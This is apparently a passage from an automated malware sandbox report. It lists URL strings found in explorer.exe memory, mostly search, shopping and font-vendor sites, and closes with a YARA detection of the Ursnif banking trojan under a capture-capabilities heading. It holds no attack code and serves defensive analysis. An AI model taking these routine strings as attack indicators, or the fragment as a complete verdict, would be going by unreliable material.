Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000002.674152655.0000000002280000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.19.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.659633766.0000000007CC8000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml2.19.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml3.19.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml4.19.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml5.19.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml6.19.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml7.19.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml8.19.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
